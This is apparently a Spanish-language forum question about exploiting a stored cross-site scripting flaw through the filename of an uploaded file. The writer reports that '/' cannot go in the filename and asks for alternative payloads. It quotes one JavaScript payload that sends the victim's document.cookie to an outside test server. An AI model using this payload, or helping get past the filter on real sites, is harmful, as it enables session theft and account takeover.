Estoy intentando explotar una vulnerabilidad en el campo de nombre de archivo de una carga de archivo. La aplicación web no valida correctamente el nombre de archivo del archivo cargado y, como resultado, existe una vulnerabilidad almacenada de secuencias de comandos entre sitios.
Mi problema es que cada vez que intento cambiar el nombre del archivo para incluir algo como la carga útil a continuación, no puedo incluir /
en el nombre del archivo.
document.location='http://my_test_server.com/bla.php?cookie='+document.cookie;
¿Alguna idea / carga útil? ¿Es posible explotar esta vulnerabilidad?